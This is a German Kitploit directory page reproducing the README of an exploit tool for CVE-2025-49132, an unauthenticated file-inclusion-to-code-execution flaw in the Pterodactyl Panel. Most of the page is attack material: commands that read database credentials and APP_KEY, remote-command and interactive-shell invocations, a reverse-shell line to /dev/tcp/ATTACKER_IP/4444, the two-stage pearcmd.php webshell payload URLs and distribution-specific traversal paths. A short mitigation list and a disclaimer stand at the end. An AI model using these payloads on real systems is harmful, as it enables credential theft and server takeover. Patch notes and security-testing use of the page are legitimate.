Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-49132 — CVE für Pterodactyl (für Studium und Bildung) | Kitploit
Tools/GitHubGitHub/popyue/cve-2025-49132
SchwachstellenanalyseCode-AnalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstestsLernen & Bildung
GitHubpopyue/cve-2025-49132

CVE-2025-49132

CVE für Pterodactyl (für Studium und Bildung)

Repository anzeigen
4vor 6 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-49132 – Pterodactyl-Panel-Exploit

⚠️ Haftungsausschluss: Dieses Repository dient nur Bildungs- und Forschungszwecken im Rahmen meiner Sicherheitsforschung zum Verständnis und zur Dokumentation von CVE-2025-49132. Die Entdeckung der Schwachstelle geht vollständig auf den/die ursprünglichen Forscher zurück.

root@kitploit:~
  ___ __   __ ___      ___   ___  ___  ___        _  _   ___  _  ____  ___ 
 / __|\ \ / /| __|___ |_  ) / _ \|_  )| __|___   | || | / _ \| ||__ / |_  )
| (__  \ V / | _|___|  / / | (_) |/ / |__ \___|  |_  _| \_, /| ||_ \  / / 
 \___|  \_/  |___|    /___| \___//___||___/        |_|   /_/ |_|___/ /___|

        Pterodactyl Panel - Unauthenticated LFI to RCE Exploit

📋 Beschreibung

CVE-2025-49132 ist eine nicht authentifizierte Local File Inclusion (LFI)-Schwachstelle im Pterodactyl-Panel, die über PHP pearcmd.php zu Remote Code Execution (RCE) eskaliert werden kann.

Die Schwachstelle existiert im Endpunkt /locales/locale.json, der die Parameter locale und namespace nicht ordnungsgemäß bereinigt. Dadurch können Angreifer beliebige PHP-Konfigurationsdateien lesen und Codeausführung erreichen.

🎯 Betroffene Versionen

StatusVersion
❌ Anfällig<= 1.11.10
✅ Behoben>= 1.11.11

⚡ Funktionen

  • LFI-Modus: PHP-Konfigurationsdateien lesen (Datenbank-Zugangsdaten, APP_KEY usw.)
  • RCE-Modus: Remotecodeausführung über die pearcmd.php-LFI2RCE-Technik
  • Interaktive Shell: Beständige Shell für die Ausführung mehrerer Befehle
  • Einzelbefehl: Einmalige Befehlsausführung
  • Übersichtliche Ausgabe: Farbcodierte, formatierte Ausgabe für bessere Lesbarkeit

📦 Installation

root@kitploit:~
# Clone the repository
git clone https://github.com/YOUR_USERNAME/CVE-2025-49132.git
cd CVE-2025-49132

# Install dependencies
pip install requests

Anforderungen

  • Python 3.6+
  • requests-Bibliothek
  • curl (für den RCE-Modus)

🚀 Verwendung

LFI – Konfigurationsdateien lesen

root@kitploit:~
# Read database configuration
python exploit.py -u http://target.com --read -p ../../config -f database

# Read application configuration (contains APP_KEY)
python exploit.py -u http://target.com --read -p ../../config -f app

# Read other configurations
python exploit.py -u http://target.com --read -p ../../config -f auth
python exploit.py -u http://target.com --read -p ../../config -f session
python exploit.py -u http://target.com --read -p ../../config -f mail

RCE – Remote Code Execution

root@kitploit:~
# Single command execution
python exploit.py -u http://target.com --rce -p ../../../../../../usr/share/php/PEAR --cmd "id"
python exploit.py -u http://target.com --rce -p ../../../../../../usr/share/php/PEAR --cmd "whoami"

# Interactive shell mode
python exploit.py -u http://target.com --rce -p ../../../../../../usr/share/php/PEAR

# Reverse shell
python exploit.py -u http://target.com --rce -p ../../../../../../usr/share/php/PEAR --cmd "bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'"

Häufige PEAR-Pfade

DistributionPfad
Debian/Ubuntu../../../../../../usr/share/php
SUSE/OpenSUSE../../../../../../usr/share/php/PEAR

📖 Argumente

🔬 So funktioniert es

LFI (Local File Inclusion)

Der anfällige Endpunkt /locales/locale.json akzeptiert die Parameter locale und namespace:

root@kitploit:~
GET /locales/locale.json?locale=../../config&namespace=database

Dies ermöglicht das Lesen beliebiger PHP-Dateien, die ein Array zurückgeben, einschließlich Laravel-Konfigurationsdateien.

RCE (Remote Code Execution)

Der Exploit kombiniert LFI mit pearcmd.php, um RCE zu erreichen:

  1. Stufe 1: Mit dem Befehl config-create von pearcmd.php eine PHP-Webshell schreiben

    root@kitploit:~
    /locales/locale.json?+config-create+/&locale=../../../../../../usr/share/php/PEAR&namespace=pearcmd&/<?=system(...)?>+/tmp/shell.php
    
  2. Stufe 2: Die geschriebene Shell per LFI einbinden

    root@kitploit:~
    /locales/locale.json?locale=../../../../../../tmp&namespace=shell&c=<hex_encoded_cmd>
    

📸 Screenshots

LFI – Datenbankkonfiguration lesen

root@kitploit:~
════════════════════════════════════════════════════════════
  DATABASE CONFIGURATION
════════════════════════════════════════════════════════════

  default: mysql
  connections:
    mysql:
      driver: mysql
      host: 127.0.0.1
      port: 3306
      database: panel
      username: pterodactyl
      password: SecretPassword123

────────────────────────────────────────────────────────────
[+] Configuration extracted successfully!

RCE – Befehlsausführung

root@kitploit:~
[*] Target: http://panel.example.com
[*] Executing command: id
[*] Writing payload to: /tmp/cmd_abc123.php
[+] Output:
----------------------------------------
uid=474(wwwrun) gid=477(www) groups=477(www)
----------------------------------------

🛡️ Gegenmaßnahmen

  1. Aktualisieren Sie das Pterodactyl-Panel auf Version 1.11.11 oder neuer
  2. Implementieren Sie eine ordnungsgemäße Eingabevalidierung für die Parameter locale und namespace
  3. Verwenden Sie eine Zulassungsliste (Allowlist) für gültige Locale-/Namespace-Werte
  4. Schränken Sie die PHP-Direktive register_argc_argv ein

⚠️ Haftungsausschluss

Dieses Tool wird ausschließlich für Bildungs- und autorisierte Sicherheitstestzwecke bereitgestellt.

  • Verwenden Sie dieses Tool nur auf Systemen, die Ihnen gehören oder für die Sie eine ausdrückliche schriftliche Genehmigung zum Testen haben
  • Unbefugter Zugriff auf Computersysteme ist illegal
  • Der Autor ist nicht verantwortlich für Missbrauch oder Schäden, die durch dieses Tool verursacht werden

Verwenden Sie es verantwortungsvoll und ethisch.

📚 Referenzen

  • Pterodactyl Panel (offiziell)
  • Pterodactyl Panel GitHub
  • Details zu CVE-2025-49132
  • CVE-2025-49132: Pterodactyl Panel Allows Unauthenticated Arbitrary Remote Code Execution
  • PEAR-LFI-zu-RCE-Technik
  • PHP Filter Chain Generator
  • Local File Inclusion zu Remote Code Execution (RCE)

📝 Changelog

  • v1.0.0 – Erste Veröffentlichung
    • LFI-Konfigurationsauslesen
    • RCE über pearcmd
    • Interaktiver Shell-Modus
    • Übersichtlich formatierte Ausgabe

⭐ Gib diesem Repository einen Stern, wenn es dir nützlich war!

Tool herunterladen
CentOS/RHEL../../../../../../usr/share/pear
Alpine../../../../../../usr/share/php8
ArgumentBeschreibung
-u, --urlZiel-URL (erforderlich)
-p, --pathPfad-Traversal für LFI oder PEAR-Pfad für RCE
-f, --fileZu lesende PHP-Datei (ohne .php-Erweiterung)
--readLFI-Lesemodus aktivieren
--rceRCE-Modus aktivieren
--cmdAuszuführender Befehl (Einzelausführungsmodus)
--sdirVerzeichnis zum Schreiben der Shell (Standard: /tmp)
--snameDateiname der Shell (Standard: shell)